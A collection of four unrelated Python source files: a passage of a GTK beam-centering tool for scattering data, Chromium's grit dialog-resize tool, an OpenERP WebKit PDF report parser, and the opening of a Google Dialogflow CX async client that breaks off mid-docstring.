y_ = ampl * np.exp(-0.5 * (x_ - pos) ** 2 / hwhm ** 2) + baseline
elif curvetype == 'Lorentz':
y_ = ampl * hwhm ** 2 / (hwhm ** 2 + (pos - x_) ** 2) + baseline
else:
raise ValueError(curvetype)
self.builder.get_object('uncalval_adjustment').set_value(pos.val)
self.builder.get_object('uncalerr_adjustment').set_value(pos.err)
self.plot1d.axes.plot(x_, y_, 'r-')
self.plot1d.axes.text(pos.val, ampl.val + baseline.val, pos.tostring(plusminus=' \u00b1 '), ha='center',
va='bottom')
self.plot1d.canvas.draw()
except Exception as exc:
error_message(self.widget, 'Error while fitting', str(exc) + traceback.format_exc())
def on_manualposition_selected(self, event):
if (event.button == 1) and (event.inaxes == self.plot2d.axis):
self.plot2d.canvas.mpl_disconnect(self._manualpickingconnection)
self._manualpickingconnection = None
self.on_findcenter((event.ydata, event.xdata))
self.set_sensitive(True)
self._cursor.clear(event)
self._cursor = None
stack = self.builder.get_object('plotstack')
stack.child_set_property(stack.get_child_by_name('plot2d'), 'needs-attention', False)
self.plot2d.replot()
def on_findcenter(self, button: Union[Tuple[float, float], Gtk.Button]):
if isinstance(button, tuple):
posy, posx = button
else:
assert isinstance(button, Gtk.Button)
method = self.builder.get_object('centeringmethod_selector').get_active_text()
if method == 'Manual (click)':
stack = self.builder.get_object('plotstack')
stack.child_set_property(stack.get_child_by_name('plot2d'), 'needs-attention', True)
self._cursor = Cursor(self.plot2d.axis, useblit=False, color='white', lw=1)
self._manualpickingconnection = self.plot2d.canvas.mpl_connect(
'button_press_event', self.on_manualposition_selected)
self.set_sensitive(False, 'Manual positioning active', ['input_box', 'close_button'])
return
elif method == 'Peak amplitude':
assert isinstance(self._exposure, Exposure)
xmin, xmax = self.plot1d.get_zoom_xrange()
logger.debug('Peak amplitude method: xmin: {:f}. xmax: {:f}. Original beampos: {}, {}.'.format(
xmin, xmax, self._exposure.header.beamcenterx, self._exposure.header.beamcentery))
posy, posx = findbeam_radialpeak(
self._exposure.intensity, [self._exposure.header.beamcentery, self._exposure.header.beamcenterx],
self._exposure.mask, xmin, xmax, drive_by='amplitude')
elif method == 'Peak width':
assert isinstance(self._exposure, Exposure)
xmin, xmax = self.plot1d.get_zoom_xrange()
posy, posx = findbeam_radialpeak(
self._exposure.intensity, [self._exposure.header.beamcentery, self._exposure.header.beamcenterx],
self._exposure.mask, xmin, xmax, drive_by='hwhm')
elif method == 'Power-law goodness of fit':
assert isinstance(self._exposure, Exposure)
xmin, xmax = self.plot1d.get_zoom_xrange()
posy, posx = findbeam_powerlaw(self._exposure.intensity, [self._exposure.header.beamcentery,
self._exposure.header.beamcenterx],
self._exposure.mask, xmin, xmax)
else:
raise ValueError(method)
assert isinstance(self._exposure, Exposure)
self._exposure.header.beamcenterx = posx
self._exposure.header.beamcentery = posy
self.builder.get_object('center_label').set_text('({}, {})'.format(posx, posy))
self.plot2d.set_beampos(posx, posy)
self.radial_average()
self.builder.get_object('savecenter_button').set_sensitive(True)
def on_savecenter(self, button):
assert isinstance(self._exposure, Exposure)
self.instrument.config['geometry']['beamposx'] = self._exposure.header.beamcentery
self.instrument.config['geometry']['beamposy'] = self._exposure.header.beamcenterx
self.instrument.save_state()
logger.info('Beam center updated to ({}, {}) [(x, y) or (col, row)].'.format(
self.instrument.config['geometry']['beamposy'],
self.instrument.config['geometry']['beamposx']))
self.instrument.save_state()
button.set_sensitive(False)
def on_replot(self, button):
return self.radial_average()
def on_savedistance(self, button):
self.instrument.config['geometry']['dist_sample_det'] = self._dist.val
self.instrument.config['geometry']['dist_sample_det.err'] = self._dist.err
logger.info('Sample-to-detector distance updated to {:.4f} \u00b1 {:.4f} mm.'.format(
self.instrument.config['geometry']['dist_sample_det'],
self.instrument.config['geometry']['dist_sample_det.err']))
self.instrument.save_state()
button.set_sensitive(False)
def radial_average(self):
assert isinstance(self._exposure, Exposure)
self._curve = self._exposure.radial_average(pixel=True)
assert isinstance(self._curve, Curve)
try:
sampletitle = self._exposure.header.title
except KeyError:
sampletitle = 'no sample'
self.plot1d.addcurve(
self._curve.q, self._curve.Intensity, self._curve.qError, self._curve.Error,
'FSN #{:d}: {}. Beam: ({}, {})'.format(
self._exposure.header.fsn, sampletitle,
self._exposure.header.beamcenterx,
self._exposure.header.beamcentery), 'pixel')
def on_loadexposure(self, exposureloader, im: Exposure):
self._exposure = im
with self.plot2d.inhibit_replot:
self.plot2d.set_beampos(im.header.beamcenterx, im.header.beamcentery)
self.plot2d.set_wavelength(im.header.wavelength)
self.plot2d.set_distance(im.header.distance)
assert im.header.pixelsizex == im.header.pixelsizey
self.plot2d.set_pixelsize(im.header.pixelsizex)
self.plot2d.set_mask(im.mask)
self.plot2d.set_image(im.intensity)
self.builder.get_object('center_label').set_text('({}, {})'.format(
im.header.beamcenterx,
im.header.beamcentery))
self.radial_average()
def on_loadexposure_error(self, exposureloader, message):
self.error_message(message)
| |
#!/usr/bin/python2.4
# Copyright (c) 2006-2008 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''The 'grit resize' tool.
'''
import getopt
import os
import types
from grit.tool import interface
from grit.tool import build
from grit import grd_reader
from grit import pseudo
from grit import util
from grit.node import include
from grit.node import structure
from grit.node import message
from grit.format import rc_header
# Template for the .vcproj file, with a couple of [[REPLACEABLE]] parts.
PROJECT_TEMPLATE = '''\
<?xml version="1.0" encoding="Windows-1252"?>
<VisualStudioProject
ProjectType="Visual C++"
Version="7.10"
Name="[[DIALOG_NAME]]"
ProjectGUID="[[PROJECT_GUID]]"
Keyword="Win32Proj">
<Platforms>
<Platform
Name="Win32"/>
</Platforms>
<Configurations>
<Configuration
Name="Debug|Win32"
OutputDirectory="Debug"
IntermediateDirectory="Debug"
ConfigurationType="1"
CharacterSet="2">
</Configuration>
</Configurations>
<References>
</References>
<Files>
<Filter
Name="Resource Files"
Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx"
UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}">
<File
RelativePath=".\[[DIALOG_NAME]].rc">
</File>
</Filter>
</Files>
<Globals>
</Globals>
</VisualStudioProject>'''
# Template for the .rc file with a couple of [[REPLACEABLE]] parts.
# TODO(joi) Improve this (and the resource.h template) to allow saving and then
# reopening of the RC file in Visual Studio. Currently you can only open it
# once and change it, then after you close it you won't be able to reopen it.
RC_TEMPLATE = '''\
// Copyright (c) Google Inc. 2005
// All rights reserved.
// This file is automatically generated by GRIT and intended for editing
// the layout of the dialogs contained in it. Do not edit anything but the
// dialogs. Any changes made to translateable portions of the dialogs will
// be ignored by GRIT.
#include "resource.h"
#include <winres.h>
#include <winresrc.h>
LANGUAGE LANG_NEUTRAL, SUBLANG_NEUTRAL
#pragma code_page([[CODEPAGE_NUM]])
[[INCLUDES]]
[[DIALOGS]]
'''
# Template for the resource.h file with a couple of [[REPLACEABLE]] parts.
HEADER_TEMPLATE = '''\
// Copyright (c) Google Inc. 2005
// All rights reserved.
// This file is automatically generated by GRIT. Do not edit.
#pragma once
// Edit commands
#define ID_EDIT_CLEAR 0xE120
#define ID_EDIT_CLEAR_ALL 0xE121
#define ID_EDIT_COPY 0xE122
#define ID_EDIT_CUT 0xE123
#define ID_EDIT_FIND 0xE124
#define ID_EDIT_PASTE 0xE125
#define ID_EDIT_PASTE_LINK 0xE126
#define ID_EDIT_PASTE_SPECIAL 0xE127
#define ID_EDIT_REPEAT 0xE128
#define ID_EDIT_REPLACE 0xE129
#define ID_EDIT_SELECT_ALL 0xE12A
#define ID_EDIT_UNDO 0xE12B
#define ID_EDIT_REDO 0xE12C
[[DEFINES]]
'''
class ResizeDialog(interface.Tool):
'''Generates an RC file, header and Visual Studio project that you can use
with Visual Studio's GUI resource editor to modify the layout of dialogs for
the language of your choice. You then use the RC file, after you resize the
dialog, for the language or languages of your choice, using the <skeleton> child
of the <structure> node for the dialog. The translateable bits of the dialog
will be ignored when you use the <skeleton> node (GRIT will instead use the
translateable bits from the original dialog) but the layout changes you make
will be used. Note that your layout changes must preserve the order of the
translateable elements in the RC file.
Usage: grit resize [-f BASEFOLDER] [-l LANG] [-e RCENCODING] DIALOGID*
Arguments:
DIALOGID The 'name' attribute of a dialog to output for resizing. Zero
or more of these parameters can be used. If none are
specified, all dialogs from the input .grd file are output.
Options:
-f BASEFOLDER The project will be created in a subfolder of BASEFOLDER.
The name of the subfolder will be the first DIALOGID you
specify. Defaults to '.'
-l LANG Specifies that the RC file should contain a dialog translated
into the language LANG. The default is a cp1252-representable
pseudotranslation, because Visual Studio's GUI RC editor only
supports single-byte encodings.
-c CODEPAGE Code page number to indicate to the RC compiler the encoding
of the RC file, default is something reasonable for the
language you selected (but this does not work for every single
language). See details on codepages below. NOTE that you do
not need to specify the codepage unless the tool complains
that it's not sure which codepage to use. See the following
page for codepage numbers supported by Windows:
http://www.microsoft.com/globaldev/reference/wincp.mspx
-D NAME[=VAL] Specify a C-preprocessor-like define NAME with optional
value VAL (defaults to 1) which will be used to control
conditional inclusion of resources.
IMPORTANT NOTE: For now, the tool outputs a UTF-8 encoded file for any language
that can not be represented in cp1252 (i.e. anything other than Western
European languages). You will need to open this file in a text editor and
save it using the codepage indicated in the #pragma code_page(XXXX) command
near the top of the file, before you open it in Visual Studio.
'''
# TODO(joi) It would be cool to have this tool note the Perforce revision
# of the original RC file somewhere, such that the <skeleton> node could warn
# if the original RC file gets updated without the skeleton file being updated.
# TODO(joi) Would be cool to have option to add the files to Perforce
def __init__(self):
self.lang = pseudo.PSEUDO_LANG
self.defines = {}
self.base_folder = '.'
self.codepage_number = 1252
self.codepage_number_specified_explicitly = False
def SetLanguage(self, lang):
'''Sets the language code to output things in.
'''
self.lang = lang
if not self.codepage_number_specified_explicitly:
self.codepage_number = util.LanguageToCodepage(lang)
def GetEncoding(self):
if self.codepage_number == 1200:
return 'utf_16'
if self.codepage_number == 65001:
return 'utf_8'
return 'cp%d' % self.codepage_number
def ShortDescription(self):
return 'Generate a file where you can resize a given dialog.'
def Run(self, opts, args):
self.SetOptions(opts)
own_opts, args = getopt.getopt(args, 'l:f:c:D:')
for key, val in own_opts:
if key == '-l':
self.SetLanguage(val)
if key == '-f':
self.base_folder = val
if key == '-c':
self.codepage_number = int(val)
self.codepage_number_specified_explicitly = True
if key == '-D':
name, val = build.ParseDefine(val)
self.defines[name] = val
res_tree = grd_reader.Parse(opts.input, debug=opts.extra_verbose)
res_tree.OnlyTheseTranslations([self.lang])
res_tree.RunGatherers(True)
# Dialog IDs are either explicitly listed, or we output all dialogs from the
# .grd file
dialog_ids = args
if not len(dialog_ids):
for node in res_tree:
if node.name == 'structure' and node.attrs['type'] == 'dialog':
dialog_ids.append(node.attrs['name'])
self.Process(res_tree, dialog_ids)
def Process(self, grd, dialog_ids):
'''Outputs an RC file and header file for the dialog 'dialog_id' stored in
resource tree 'grd', to self.base_folder, as discussed in this class's
documentation.
Arguments:
grd: grd = grd_reader.Parse(...); grd.RunGatherers()
dialog_ids: ['IDD_MYDIALOG', 'IDD_OTHERDIALOG']
'''
grd.SetOutputContext(self.lang, self.defines)
project_name = dialog_ids[0]
dir_path = os.path.join(self.base_folder, project_name)
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
# If this fails then we're not on Windows (or you don't have the required
# win32all Python libraries installed), so what are you doing mucking
# about with RC files anyway? :)
import pythoncom
# Create the .vcproj file
project_text = PROJECT_TEMPLATE.replace(
'[[PROJECT_GUID]]', str(pythoncom.CreateGuid())
).replace('[[DIALOG_NAME]]', project_name)
fname = os.path.join(dir_path, '%s.vcproj' % project_name)
self.WriteFile(fname, project_text)
print "Wrote %s" % fname
# Create the .rc file
# Output all <include> nodes since the dialogs might depend on them (e.g.
# for icons and bitmaps).
include_items = []
for node in grd:
if isinstance(node, include.IncludeNode):
formatter = node.ItemFormatter('rc_all')
if formatter:
include_items.append(formatter.Format(node, self.lang))
rc_text = RC_TEMPLATE.replace('[[CODEPAGE_NUM]]',
str(self.codepage_number))
rc_text = rc_text.replace('[[INCLUDES]]', ''.join(include_items))
# Then output the dialogs we have been asked to output.
dialogs = []
for dialog_id in dialog_ids:
node = grd.GetNodeById(dialog_id)
# TODO(joi) Add exception handling for better error reporting
formatter = node.ItemFormatter('rc_all')
dialogs.append(formatter.Format(node, self.lang))
rc_text = rc_text.replace('[[DIALOGS]]', ''.join(dialogs))
fname = os.path.join(dir_path, '%s.rc' % project_name)
self.WriteFile(fname, rc_text, self.GetEncoding())
print "Wrote %s" % fname
# Create the resource.h file
header_defines = []
for node in grd:
formatter = node.ItemFormatter('rc_header')
if formatter and not isinstance(formatter, rc_header.TopLevel):
header_defines.append(formatter.Format(node, self.lang))
header_text = HEADER_TEMPLATE.replace('[[DEFINES]]', ''.join(header_defines))
fname = os.path.join(dir_path, 'resource.h')
self.WriteFile(fname, header_text)
print "Wrote %s" % fname
def WriteFile(self, filename, contents, encoding='cp1252'):
f = util.WrapOutputStream(file(filename, 'wb'), encoding)
f.write(contents)
f.close()
| |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2010 Camptocamp SA (http://www.camptocamp.com)
# All Right Reserved
#
# Author : Nicolas Bessi (Camptocamp)
# Contributor(s) : Florent Xicluna (Wingo SA)
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
##############################################################################
import subprocess
import os
import sys
from openerp import report
import tempfile
import time
import logging
from functools import partial
from report_helper import WebKitHelper
import openerp
from openerp.modules.module import get_module_resource
from openerp.report.report_sxw import *
from openerp import tools
from openerp.tools.translate import _
from openerp.osv.osv import except_osv
from urllib import urlencode, quote as quote
_logger = logging.getLogger(__name__)
try:
# We use a jinja2 sandboxed environment to render mako templates.
# Note that the rendering does not cover all the mako syntax, in particular
# arbitrary Python statements are not accepted, and not all expressions are
# allowed: only "public" attributes (not starting with '_') of objects may
# be accessed.
# This is done on purpose: it prevents incidental or malicious execution of
# Python code that may break the security of the server.
from jinja2.sandbox import SandboxedEnvironment
mako_template_env = SandboxedEnvironment(
block_start_string="<%",
block_end_string="%>",
variable_start_string="${",
variable_end_string="}",
comment_start_string="<%doc>",
comment_end_string="</%doc>",
line_statement_prefix="%",
line_comment_prefix="##",
trim_blocks=True, # do not output newline after blocks
autoescape=True, # XML/HTML automatic escaping
)
mako_template_env.globals.update({
'str': str,
'quote': quote,
'urlencode': urlencode,
})
except ImportError:
_logger.warning("jinja2 not available, templating features will not work!")
def mako_template(text):
"""Build a Mako template.
This template uses UTF-8 encoding
"""
return mako_template_env.from_string(text)
_extender_functions = {}
def webkit_report_extender(report_name):
"""
A decorator to define functions to extend the context used in a template rendering.
report_name must be the xml id of the desired report (it is mandatory to indicate the
module in that xml id).
The given function will be called at the creation of the report. The following arguments
will be passed to it (in this order):
- pool The model pool.
- cr The cursor.
- uid The user id.
- localcontext The context given to the template engine to render the templates for the
current report. This is the context that should be modified.
- context The OpenERP context.
"""
def fct1(fct):
lst = _extender_functions.get(report_name)
if not lst:
lst = []
_extender_functions[report_name] = lst
lst.append(fct)
return fct
return fct1
class WebKitParser(report_sxw):
"""Custom class that use webkit to render HTML reports
Code partially taken from report openoffice. Thanks guys :)
"""
def __init__(self, name, table, rml=False, parser=rml_parse,
header=True, store=False, register=True):
self.localcontext = {}
report_sxw.__init__(self, name, table, rml, parser,
header, store, register=register)
def get_lib(self, cursor, uid):
"""Return the lib wkhtml path"""
proxy = self.pool['ir.config_parameter']
webkit_path = proxy.get_param(cursor, uid, 'webkit_path')
if not webkit_path:
try:
defpath = os.environ.get('PATH', os.defpath).split(os.pathsep)
if hasattr(sys, 'frozen'):
defpath.append(os.getcwd())
if tools.config['root_path']:
defpath.append(os.path.dirname(tools.config['root_path']))
webkit_path = tools.which('wkhtmltopdf', path=os.pathsep.join(defpath))
except IOError:
webkit_path = None
if webkit_path:
return webkit_path
raise except_osv(
_('Wkhtmltopdf library path is not set'),
_('Please install executable on your system' \
' (sudo apt-get install wkhtmltopdf) or download it from here:' \
' http://code.google.com/p/wkhtmltopdf/downloads/list and set the' \
' path in the ir.config_parameter with the webkit_path key.' \
'Minimal version is 0.9.9')
)
def generate_pdf(self, comm_path, report_xml, header, footer, html_list, webkit_header=False):
"""Call webkit in order to generate pdf"""
if not webkit_header:
webkit_header = report_xml.webkit_header
fd, out_filename = tempfile.mkstemp(suffix=".pdf",
prefix="webkit.tmp.")
file_to_del = [out_filename]
if comm_path:
command = [comm_path]
else:
command = ['wkhtmltopdf']
command.append('--quiet')
# default to UTF-8 encoding. Use <meta charset="latin-1"> to override.
command.extend(['--encoding', 'utf-8'])
if header :
with tempfile.NamedTemporaryFile(suffix=".head.html",
delete=False) as head_file:
head_file.write(self._sanitize_html(header.encode('utf-8')))
file_to_del.append(head_file.name)
command.extend(['--header-html', head_file.name])
if footer :
with tempfile.NamedTemporaryFile(suffix=".foot.html",
delete=False) as foot_file:
foot_file.write(self._sanitize_html(footer.encode('utf-8')))
file_to_del.append(foot_file.name)
command.extend(['--footer-html', foot_file.name])
if webkit_header.margin_top :
command.extend(['--margin-top', str(webkit_header.margin_top).replace(',', '.')])
if webkit_header.margin_bottom :
command.extend(['--margin-bottom', str(webkit_header.margin_bottom).replace(',', '.')])
if webkit_header.margin_left :
command.extend(['--margin-left', str(webkit_header.margin_left).replace(',', '.')])
if webkit_header.margin_right :
command.extend(['--margin-right', str(webkit_header.margin_right).replace(',', '.')])
if webkit_header.orientation :
command.extend(['--orientation', str(webkit_header.orientation).replace(',', '.')])
if webkit_header.format :
command.extend(['--page-size', str(webkit_header.format).replace(',', '.')])
count = 0
for html in html_list :
with tempfile.NamedTemporaryFile(suffix="%d.body.html" %count,
delete=False) as html_file:
count += 1
html_file.write(self._sanitize_html(html.encode('utf-8')))
file_to_del.append(html_file.name)
command.append(html_file.name)
command.append(out_filename)
stderr_fd, stderr_path = tempfile.mkstemp(text=True)
file_to_del.append(stderr_path)
try:
status = subprocess.call(command, stderr=stderr_fd)
os.close(stderr_fd) # ensure flush before reading
stderr_fd = None # avoid closing again in finally block
fobj = open(stderr_path, 'r')
error_message = fobj.read()
fobj.close()
if not error_message:
error_message = _('No diagnosis message was provided')
else:
error_message = _('The following diagnosis message was provided:\n') + error_message
if status :
raise except_osv(_('Webkit error' ),
_("The command 'wkhtmltopdf' failed with error code = %s. Message: %s") % (status, error_message))
with open(out_filename, 'rb') as pdf_file:
pdf = pdf_file.read()
os.close(fd)
finally:
if stderr_fd is not None:
os.close(stderr_fd)
for f_to_del in file_to_del:
try:
os.unlink(f_to_del)
except (OSError, IOError), exc:
_logger.error('cannot remove file %s: %s', f_to_del, exc)
return pdf
def translate_call(self, parser_instance, src):
"""Translate String."""
ir_translation = self.pool['ir.translation']
name = self.tmpl and 'addons/' + self.tmpl or None
res = ir_translation._get_source(parser_instance.cr, parser_instance.uid,
name, 'report', parser_instance.localcontext.get('lang', 'en_US'), src)
if res == src:
# no translation defined, fallback on None (backward compatibility)
res = ir_translation._get_source(parser_instance.cr, parser_instance.uid,
None, 'report', parser_instance.localcontext.get('lang', 'en_US'), src)
if not res :
return src
return res
# override needed to keep the attachments storing procedure
def create_single_pdf(self, cursor, uid, ids, data, report_xml, context=None):
"""generate the PDF"""
# just try to find an xml id for the report
cr = cursor
pool = openerp.registry(cr.dbname)
found_xml_ids = pool["ir.model.data"].search(cr, uid, [["model", "=", "ir.actions.report.xml"], \
["res_id", "=", report_xml.id]], context=context)
xml_id = None
if found_xml_ids:
xml_id = pool["ir.model.data"].read(cr, uid, found_xml_ids[0], ["module", "name"])
xml_id = "%s.%s" % (xml_id["module"], xml_id["name"])
if context is None:
context={}
htmls = []
if report_xml.report_type != 'webkit':
return super(WebKitParser,self).create_single_pdf(cursor, uid, ids, data, report_xml, context=context)
parser_instance = self.parser(cursor,
uid,
self.name2,
context=context)
self.pool = pool
objs = self.getObjects(cursor, uid, ids, context)
parser_instance.set_context(objs, data, ids, report_xml.report_type)
template = False
if report_xml.report_file :
path = get_module_resource(*report_xml.report_file.split('/'))
if path and os.path.exists(path) :
template = file(path).read()
if not template and report_xml.report_webkit_data :
template = report_xml.report_webkit_data
if not template :
raise except_osv(_('Error!'), _('Webkit report template not found!'))
header = report_xml.webkit_header.html
footer = report_xml.webkit_header.footer_html
if not header and report_xml.use_global_header:
raise except_osv(
_('No header defined for this Webkit report!'),
_('Please set a header in company settings.')
)
if not report_xml.use_global_header :
header = ''
default_head = get_module_resource('report_webkit', 'default_header.html')
with open(default_head,'r') as f:
header = f.read()
css = report_xml.webkit_header.css
if not css :
css = ''
translate_call = partial(self.translate_call, parser_instance)
body_mako_tpl = mako_template(template)
helper = WebKitHelper(cursor, uid, report_xml.id, context)
parser_instance.localcontext['helper'] = helper
parser_instance.localcontext['css'] = css
parser_instance.localcontext['_'] = translate_call
# apply extender functions
additional = {}
if xml_id in _extender_functions:
for fct in _extender_functions[xml_id]:
fct(pool, cr, uid, parser_instance.localcontext, context)
if report_xml.precise_mode:
ctx = dict(parser_instance.localcontext)
for obj in parser_instance.localcontext['objects']:
ctx['objects'] = [obj]
try :
html = body_mako_tpl.render(dict(ctx))
htmls.append(html)
except Exception, e:
msg = u"%s" % e
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
else:
try :
html = body_mako_tpl.render(dict(parser_instance.localcontext))
htmls.append(html)
except Exception, e:
msg = u"%s" % e
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
head_mako_tpl = mako_template(header)
try :
head = head_mako_tpl.render(dict(parser_instance.localcontext, _debug=False))
except Exception, e:
raise except_osv(_('Webkit render!'), u"%s" % e)
foot = False
if footer :
foot_mako_tpl = mako_template(footer)
try :
foot = foot_mako_tpl.render(dict(parser_instance.localcontext))
except Exception, e:
msg = u"%s" % e
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
if report_xml.webkit_debug :
try :
deb = head_mako_tpl.render(dict(parser_instance.localcontext, _debug=tools.ustr("\n".join(htmls))))
except Exception, e:
msg = u"%s" % e
_logger.error(msg)
raise except_osv(_('Webkit render!'), msg)
return (deb, 'html')
bin = self.get_lib(cursor, uid)
pdf = self.generate_pdf(bin, report_xml, head, foot, htmls)
return (pdf, 'pdf')
def create(self, cursor, uid, ids, data, context=None):
"""We override the create function in order to handle generator
Code taken from report openoffice. Thanks guys :) """
pool = openerp.registry(cursor.dbname)
ir_obj = pool['ir.actions.report.xml']
report_xml_ids = ir_obj.search(cursor, uid,
[('report_name', '=', self.name[7:])], context=context)
if report_xml_ids:
report_xml = ir_obj.browse(cursor, uid, report_xml_ids[0], context=context)
else:
return super(WebKitParser, self).create(cursor, uid, ids, data, context)
setattr(report_xml, 'use_global_header', self.header if report_xml.header else False)
if report_xml.report_type != 'webkit':
return super(WebKitParser, self).create(cursor, uid, ids, data, context)
result = self.create_source_pdf(cursor, uid, ids, data, report_xml, context)
if not result:
return (False,False)
return result
def _sanitize_html(self, html):
"""wkhtmltopdf expects the html page to declare a doctype.
"""
if html and html[:9].upper() != "<!DOCTYPE":
html = "<!DOCTYPE html>\n" + html
return html
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| |
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
import functools
import re
from typing import Dict, Optional, Sequence, Tuple, Type, Union
import pkg_resources
from google.api_core.client_options import ClientOptions
from google.api_core import exceptions as core_exceptions
from google.api_core import gapic_v1
from google.api_core import retry as retries
from google.auth import credentials as ga_credentials # type: ignore
from google.oauth2 import service_account # type: ignore
try:
OptionalRetry = Union[retries.Retry, gapic_v1.method._MethodDefault]
except AttributeError: # pragma: NO COVER
OptionalRetry = Union[retries.Retry, object] # type: ignore
from google.cloud.dialogflowcx_v3beta1.services.session_entity_types import pagers
from google.cloud.dialogflowcx_v3beta1.types import entity_type
from google.cloud.dialogflowcx_v3beta1.types import session_entity_type
from google.cloud.dialogflowcx_v3beta1.types import (
session_entity_type as gcdc_session_entity_type,
)
from google.protobuf import field_mask_pb2 # type: ignore
from .transports.base import SessionEntityTypesTransport, DEFAULT_CLIENT_INFO
from .transports.grpc_asyncio import SessionEntityTypesGrpcAsyncIOTransport
from .client import SessionEntityTypesClient
class SessionEntityTypesAsyncClient:
"""Service for managing
[SessionEntityTypes][google.cloud.dialogflow.cx.v3beta1.SessionEntityType].
"""
_client: SessionEntityTypesClient
DEFAULT_ENDPOINT = SessionEntityTypesClient.DEFAULT_ENDPOINT
DEFAULT_MTLS_ENDPOINT = SessionEntityTypesClient.DEFAULT_MTLS_ENDPOINT
session_entity_type_path = staticmethod(
SessionEntityTypesClient.session_entity_type_path
)
parse_session_entity_type_path = staticmethod(
SessionEntityTypesClient.parse_session_entity_type_path
)
common_billing_account_path = staticmethod(
SessionEntityTypesClient.common_billing_account_path
)
parse_common_billing_account_path = staticmethod(
SessionEntityTypesClient.parse_common_billing_account_path
)
common_folder_path = staticmethod(SessionEntityTypesClient.common_folder_path)
parse_common_folder_path = staticmethod(
SessionEntityTypesClient.parse_common_folder_path
)
common_organization_path = staticmethod(
SessionEntityTypesClient.common_organization_path
)
parse_common_organization_path = staticmethod(
SessionEntityTypesClient.parse_common_organization_path
)
common_project_path = staticmethod(SessionEntityTypesClient.common_project_path)
parse_common_project_path = staticmethod(
SessionEntityTypesClient.parse_common_project_path
)
common_location_path = staticmethod(SessionEntityTypesClient.common_location_path)
parse_common_location_path = staticmethod(
SessionEntityTypesClient.parse_common_location_path
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
SessionEntityTypesAsyncClient: The constructed client.
"""
return SessionEntityTypesClient.from_service_account_info.__func__(SessionEntityTypesAsyncClient, info, *args, **kwargs) # type: ignore
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
SessionEntityTypesAsyncClient: The constructed client.
"""
return SessionEntityTypesClient.from_service_account_file.__func__(SessionEntityTypesAsyncClient, filename, *args, **kwargs) # type: ignore
from_service_account_json = from_service_account_file
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
(1) if `client_options.api_endpoint` if provided, use the provided one.
(2) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is "always", use the
default mTLS endpoint; if the environment variabel is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
return SessionEntityTypesClient.get_mtls_endpoint_and_cert_source(client_options) # type: ignore
@property
def transport(self) -> SessionEntityTypesTransport:
"""Returns the transport used by the client instance.
Returns:
SessionEntityTypesTransport: The transport used by the client instance.
"""
return self._client.transport
get_transport_class = functools.partial(
type(SessionEntityTypesClient).get_transport_class,
type(SessionEntityTypesClient),
)
def __init__(
self,
*,
credentials: ga_credentials.Credentials = None,
transport: Union[str, SessionEntityTypesTransport] = "grpc_asyncio",
client_options: ClientOptions = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the session entity types client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, ~.SessionEntityTypesTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (ClientOptions): Custom options for the client. It
won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
